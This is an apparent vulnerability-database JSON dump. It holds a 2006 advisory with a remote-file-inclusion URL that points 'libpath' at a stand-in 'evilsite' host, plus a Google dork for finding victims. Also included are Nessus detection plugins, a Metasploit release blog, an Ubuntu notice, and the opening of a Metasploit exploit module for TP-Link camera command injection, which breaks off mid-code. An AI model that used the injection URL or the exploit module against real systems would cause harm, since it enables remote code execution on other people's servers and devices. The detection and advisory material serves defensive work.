{"id": "SECURITYVULNS:DOC:12109", "bulletinFamily": "software", "title": "Autonomous LAN party File iNclusion", "description": "Autonomous LAN party File iNclusion \r\n\r\n--------------------------------------------\r\nSite:http://www.nerdclub.net/alp/\r\nDemo:http://www.redfiles.net/cup/credits.php\r\n\r\n--------------------------------------------\r\nExample:\r\n\r\nhttp://victim.com/path/include/SQuery/gameSpy2.php?libpath=http://evilsite\r\n\r\n---------------------------------------------\r\nCredit:Codexploder'tq\r\nMail :codexploder@linuxmail.org\r\nsite :www.biyo.tk www.biyosecurity.be\r\n\r\n---------------------------------------------\r\nGoogle:\r\n\r\nintitle:"Autonomous LAN party"\r\n\r\n--------------------------------------------\r\nSource:\r\n\r\nhttp://liz0zim.no-ip.org/alp.txt\r\nhttp://www.blogcu.com/Liz0ziM/431845/\r\n\r\n", "published": "2006-04-09T00:00:00", "modified": "2006-04-09T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12109", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:16", "edition": 1, "viewCount": 2, "enchantments": {"score": {"value": 3.3, "vector": "NONE", "modified": "2018-08-31T11:10:16", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB2746164", "KB953334", "KB2874216", "KB981401", "KB983509", "KB2425179", "KB2510690", "KB2501721", "KB980408", "KB2785908"]}, {"type": "threatpost", "idList": ["THREATPOST:F3563336B135A1D7C1251AE54FDC6286"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2164.NASL", "FREEBSD_PKG_D887B3D9736611EAB81A001CC0382B2F.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892164"]}], "modified": "2018-08-31T11:10:16", "rev": 2}, "vulnersScore": 3.3}, "affectedSoftware": []}

{"nessus": [{"lastseen": "2020-11-25T15:14:32", "description": "The remote Ubuntu 16.04 LTS host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe USN-4542-1 advisory.\n\n - The upnp_event_prepare function in upnpevents.c in MiniUPnP MiniUPnPd through 2.1 allows a remote attacker\n to leak information from the heap due to improper validation of an snprintf return value. (CVE-2019-12107)\n\n - A Denial Of Service vulnerability in MiniUPnP MiniUPnPd through 2.1 exists due to a NULL pointer\n dereference in GetOutboundPinholeTimeout in upnpsoap.c for int_port. (CVE-2019-12108)\n\n - A Denial Of Service vulnerability in MiniUPnP MiniUPnPd through 2.1 exists due to a NULL pointer\n dereference in GetOutboundPinholeTimeout in upnpsoap.c for rem_port. (CVE-2019-12109)\n\n - An AddPortMapping Denial Of Service vulnerability in MiniUPnP MiniUPnPd through 2.1 exists due to a NULL\n pointer dereference in upnpredirect.c. (CVE-2019-12110)\n\n - A Denial Of Service vulnerability in MiniUPnP MiniUPnPd through 2.1 exists due to a NULL pointer\n dereference in copyIPv6IfDifferent in pcpserver.c. (CVE-2019-12111)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2020-09-26T00:00:00", "title": "Ubuntu 16.04 LTS : MiniUPnPd vulnerabilities (USN-4542-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12107", "CVE-2019-12110", "CVE-2019-12108", "CVE-2019-12111", "CVE-2019-12109"], "modified": "2020-09-26T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:miniupnpd", "cpe:/o:canonical:ubuntu_linux:16.04:-:lts"], "id": "UBUNTU_USN-4542-1.NASL", "href": "https://www.tenable.com/plugins/nessus/140802", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4542-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140802);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/24\");\n\n script_cve_id(\n \"CVE-2019-12107\",\n \"CVE-2019-12108\",\n \"CVE-2019-12109\",\n \"CVE-2019-12110\",\n \"CVE-2019-12111\"\n );\n script_xref(name:\"USN\", value:\"4542-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : MiniUPnPd vulnerabilities (USN-4542-1)\");\n script_summary(english:\"Checks the dpkg output for the updated package\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe USN-4542-1 advisory.\n\n - The upnp_event_prepare function in upnpevents.c in MiniUPnP MiniUPnPd through 2.1 allows a remote attacker\n to leak information from the heap due to improper validation of an snprintf return value. (CVE-2019-12107)\n\n - A Denial Of Service vulnerability in MiniUPnP MiniUPnPd through 2.1 exists due to a NULL pointer\n dereference in GetOutboundPinholeTimeout in upnpsoap.c for int_port. (CVE-2019-12108)\n\n - A Denial Of Service vulnerability in MiniUPnP MiniUPnPd through 2.1 exists due to a NULL pointer\n dereference in GetOutboundPinholeTimeout in upnpsoap.c for rem_port. (CVE-2019-12109)\n\n - An AddPortMapping Denial Of Service vulnerability in MiniUPnP MiniUPnPd through 2.1 exists due to a NULL\n pointer dereference in upnpredirect.c. (CVE-2019-12110)\n\n - A Denial Of Service vulnerability in MiniUPnP MiniUPnPd through 2.1 exists due to a NULL pointer\n dereference in copyIPv6IfDifferent in pcpserver.c. (CVE-2019-12111)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4542-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected miniupnpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-12107\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:miniupnpd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2020 Canonical, Inc. / NASL script (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '16.04', 'pkgname': 'miniupnpd', 'pkgver': '1.8.20140523-4.1+deb9u2build0.16.04.1'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'miniupnpd');\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T02:20:13", "description": "Security patches.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-10-07T00:00:00", "title": "Fedora 31 : miniupnpd (2019-0a26e06dd5)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12107", "CVE-2019-12110", "CVE-2019-12108", "CVE-2019-12111", "CVE-2019-12109"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:miniupnpd", "cpe:/o:fedoraproject:fedora:31"], "id": "FEDORA_2019-0A26E06DD5.NASL", "href": "https://www.tenable.com/plugins/nessus/129600", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-0a26e06dd5.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129600);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/12/23\");\n\n script_cve_id(\"CVE-2019-12107\", \"CVE-2019-12108\", \"CVE-2019-12109\", \"CVE-2019-12110\", \"CVE-2019-12111\");\n script_xref(name:\"FEDORA\", value:\"2019-0a26e06dd5\");\n\n script_name(english:\"Fedora 31 : miniupnpd (2019-0a26e06dd5)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security patches.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-0a26e06dd5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected miniupnpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:miniupnpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:31\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^31([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 31\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC31\", reference:\"miniupnpd-2.1-7.fc31\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"miniupnpd\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T09:40:49", "description": "Ben Barnea and colleagues from VDOO discovered several vulnerabilities\nin miniupnpd, a small daemon that provides UPnP Internet Gateway\nDevice and Port Mapping Protocol services. The issues are basically\ninformation leak, NULL pointer dereferences and uses after free.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1.8.20140523-4+deb8u1.\n\nWe recommend that you upgrade your miniupnpd packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 16, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-05-31T00:00:00", "title": "Debian DLA-1811-1 : miniupnpd security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12107", "CVE-2017-1000494", "CVE-2019-12110", "CVE-2019-12108", "CVE-2019-12111", "CVE-2019-12109"], "modified": "2019-05-31T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:miniupnpd", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-1811.NASL", "href": "https://www.tenable.com/plugins/nessus/125607", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1811-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125607);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-1000494\", \"CVE-2019-12107\", \"CVE-2019-12108\", \"CVE-2019-12109\", \"CVE-2019-12110\", \"CVE-2019-12111\");\n\n script_name(english:\"Debian DLA-1811-1 : miniupnpd security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Barnea and colleagues from VDOO discovered several vulnerabilities\nin miniupnpd, a small daemon that provides UPnP Internet Gateway\nDevice and Port Mapping Protocol services. The issues are basically\ninformation leak, NULL pointer dereferences and uses after free.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1.8.20140523-4+deb8u1.\n\nWe recommend that you upgrade your miniupnpd packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2019/05/msg00045.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/miniupnpd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected miniupnpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-12107\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:miniupnpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"miniupnpd\", reference:\"1.8.20140523-4+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "rapid7blog": [{"lastseen": "2020-09-29T20:39:12", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000353", "CVE-2018-18556", "CVE-2020-1048", "CVE-2020-12109", "CVE-2020-1472", "CVE-2020-17506"], "description": "\n\nNine! Nine new modules! (Ah ha ha!)\n\nWith the coming of autumn here in the Northern hemisphere, the nights are getting longer, and the hacking is getting stronger. We\u2019ve really got something for everybody in this release, from IoT to infrastructure, Windows, and Linux; everyone\u2019s pretty well-represented!\n\nWindows has been patching several vulnerabilities lately, and we have modules for them! Metasploit\u2019s own [Spencer](<https://github.com/ZeroSteiner>) and [Brendan](<https://github.com/bwatters-r7>) have been working on bringing in work from others; Spencer wrote a Zerologon ([CVE-2020-1472](<https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472-aka-zerologon?#rapid7-analysis>)) module based on the work by Tom Tervoort, and Brendan wrote a module covering the PrinterDemon vulnerability ([CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=wrap-up>)) building on the work of Alex Ionescue and [shubham0d](<https://github.com/shubham0d>).\n\nSpencer also added a new SOCKS module to unite the tribes of proxies currently in Metasploit, with one module to rule them all, and in the darkness, bind them!\n\nNot to be outdone, our own [Shelby](<https://github.com/space-r7>) added to the module count with [CVE-2017-1000353](<https://attackerkb.com/topics/V3oreaqint/cve-2017-1000353?referrer=wrap-up>) and YAJDV (Yet another Java Deserialization Vulnerability) against everyone\u2019s favorite devops tool, Jenkins. Now you can ask Jenkins to test your code _or_ run it! While this vulnerability may be a bit older, we all know people miss patches, so it is worth checking out.\n\nRounding out the Metasploit team\u2019s contributions are [Grant](<https://github.com/gwillcox-r7>) and a new module to gather information on installed software on targets, and when we say targets, we mean it: Windows, Linux, Android, and Mac are all covered by this new gather module!\n\nAs if the Metasploit team\u2019s contributions were not enough, we had some seriously high-quality work come in from our community members as well! Auth bypasses for Artica Proxy by [Niboucha Redouane](<https://github.com/red0xff>), Cloud Camera command injection by Pietro Olivia, VyOS escape by Rich Mirch and [bcoles](<https://github.com/bcoles>), and a SecureCRT password decryptor by cn-kali-team.\n\n## New modules (9)\n\n * [Artica proxy 4.30.000000 Auth Bypass service-cmds-peform Command Injection](<https://github.com/rapid7/metasploit-framework/pull/14025>) by Max0x4141 and Redouane NIBOUCHA, which exploits [CVE-2020-17506](<https://attackerkb.com/topics/TIR8HEspsz/cve-2020-17506?referrer=blog>)\n * [Jenkins CLI Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14122>) by SSD, Shelby Pace, and Unknown, which exploits [CVE-2017-1000353](<https://attackerkb.com/topics/V3oreaqint/cve-2017-1000353?referrer=blog>)\n * [TP-Link Cloud Cameras NCXXX Bonjour Command Injection](<https://github.com/rapid7/metasploit-framework/pull/14135>) by Pietro Oliva, which exploits [CVE-2020-12109](<https://attackerkb.com/topics/TTBzMpfHr2/cve-2020-12109?referrer=blog>)\n * [VyOS restricted-shell Escape and Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/14123>) by Rich Mirch and bcoles, which exploits [CVE-2018-18556](<https://attackerkb.com/topics/75ZrO8GTzs/cve-2018-18556?referrer=blog>)\n * [Microsoft Spooler Local Privilege Elevation Vulnerability](<https://github.com/rapid7/metasploit-framework/pull/14023>) by Alex Ionescu, Yarden Shafir, bwatters-r7, and shubham0d, which exploits [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>)\n * [Netlogon Weak Cryptographic Authentication](<https://github.com/rapid7/metasploit-framework/pull/14151>) by Dirk-jan Mollema, Spencer McIntyre, and Tom Tervoort, which exploits [CVE-2020-1472](<https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472-aka-zerologon?referrer=blog>)\n * [SOCKS Proxy Server](<https://github.com/rapid7/metasploit-framework/pull/14173>) by Spencer McIntyre, sf, and surefire\n * [Multiplatform Installed Software Version Enumerator](<https://github.com/rapid7/metasploit-framework/pull/14140>) by gwillcox-r7\n * [Windows SecureCRT Session Information Enumeration](<https://github.com/rapid7/metasploit-framework/pull/14118>) by HyperSine and Kali-Team\n\n## Bugs fixed\n\n * [Show correct rank for show exploits command](<https://github.com/rapid7/metasploit-framework/pull/14176>) from [Alan David Foster](<https://github.com/adfoster-r7>) fixes a bug where the ranking for exploits was not shown properly when the `show exploits` command was used.\n * [Always display `SRVHOST` and `SRVPORT` options when `CMDSTAGER::FLAVOR` is set to `auto`](<https://github.com/rapid7/metasploit-framework/pull/14153>) from [Christophe](<https://github.com/cdelafuente-r7>) fixes a bug where the SRVPORT and SRVHOST parameters are not displayed properly if the command stager flavor is set to `auto`\n * [Fix is_known_pipename module](<https://github.com/rapid7/metasploit-framework/pull/14035>) also from Christophe fixes an issue in the is_known_pipename exploit module which targets samba. There was an incorrect SMB version 1 data structure definition that was causing the module to fail to verify a writeable directory.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog \npost from GitHub:\n\n * [Pull Requests 6.0.7...6.0.8](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-09-17T11%3A03%3A21-05%3A00..2020-09-24T11%3A12%3A08-05%3A00%22>)\n * [Full diff 6.0.7...6.0.8](<https://github.com/rapid7/metasploit-framework/compare/6.0.7...6.0.8>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>)(master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2020-09-25T18:54:14", "published": "2020-09-25T18:54:14", "id": "RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "href": "https://blog.rapid7.com/2020/09/25/metasploit-wrap-up-80/", "type": "rapid7blog", "title": "Metasploit Wrap-up", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-09-25T21:08:01", "bulletinFamily": "unix", "cvelist": ["CVE-2019-12107", "CVE-2019-12110", "CVE-2019-12108", "CVE-2019-12111", "CVE-2019-12109"], "description": "It was discovered that MiniUPnPd did not properly validate callback \naddresses. A remote attacker could possibly use this issue to expose \nsensitive information. (CVE-2019-12107)\n\nIt was discovered that MiniUPnPd incorrectly handled unpopulated user XML \ninput. An attacker could possibly use this issue to cause MiniUPnPd to \ncrash, resulting in a denial of service. (CVE-2019-12108, CVE-2019-12109)\n\nIt was discovered that MiniUPnPd incorrectly handled an empty description \nwhen port mapping. An attacker could possibly use this issue to cause \nMiniUPnPd to crash, resulting in a denial of service. (CVE-2019-12110)\n\nIt was discovered that MiniUPnPd did not properly parse certain PCP \nrequests. An attacker could possibly use this issue to cause MiniUPnPd to \ncrash, resulting in a denial of service. (CVE-2019-12111)", "edition": 1, "modified": "2020-09-25T00:00:00", "published": "2020-09-25T00:00:00", "id": "USN-4542-1", "href": "https://ubuntu.com/security/notices/USN-4542-1", "title": "MiniUPnPd vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2020-09-18T17:24:59", "description": "", "published": "2020-09-18T00:00:00", "type": "packetstorm", "title": "TP-Link Cloud Cameras NCXXX Bonjour Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-12109", "CVE-2020-12110"], "modified": "2020-09-18T00:00:00", "id": "PACKETSTORM:159222", "href": "https://packetstormsecurity.com/files/159222/TP-Link-Cloud-Cameras-NCXXX-Bonjour-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'TP-Link Cloud Cameras NCXXX Bonjour Command Injection', \n'Description' => %q{ \nTP-Link cloud cameras NCXXX series (NC200, NC210, NC220, NC230, \nNC250, NC260, NC450) are vulnerable to an authenticated command \ninjection. In all devices except NC210, despite a check on the name length in \nswSystemSetProductAliasCheck, no other checks are in place in order \nto prevent shell metacharacters from being introduced. The system name \nwould then be used in swBonjourStartHTTP as part of a shell command \nwhere arbitrary commands could be injected and executed as root. NC210 devices \ncannot be exploited directly via /setsysname.cgi due to proper input \nvalidation. NC210 devices are still vulnerable since swBonjourStartHTTP \ndid not perform any validation when reading the alias name from the \nconfiguration file. The configuration file can be written, and code \nexecution can be achieved by combining this issue with CVE-2020-12110. \n}, \n'Author' => ['Pietro Oliva <pietroliva[at]gmail.com>'], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12109' ], \n[ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2020-12109' ], \n[ 'URL', 'https://seclists.org/fulldisclosure/2020/May/2' ], \n[ 'CVE', '2020-12109'] \n], \n'DisclosureDate' => '2020-04-29', \n'Platform' => 'linux', \n'Arch' => ARCH_MIPSLE, \n'Targets' => \n[ \n[ \n'TP-Link NC200, NC220, NC230, NC250', \n{ \n'Arch' => ARCH_MIPSLE, \n'Platform' => 'linux', \n'CmdStagerFlavor' => [ 'wget' ] \n} \n], \n[ \n'TP-Link NC260, NC450', \n{ \n'Arch' => ARCH_MIPSLE, \n'Platform' => 'linux', \n'CmdStagerFlavor' => [ 'wget' ], 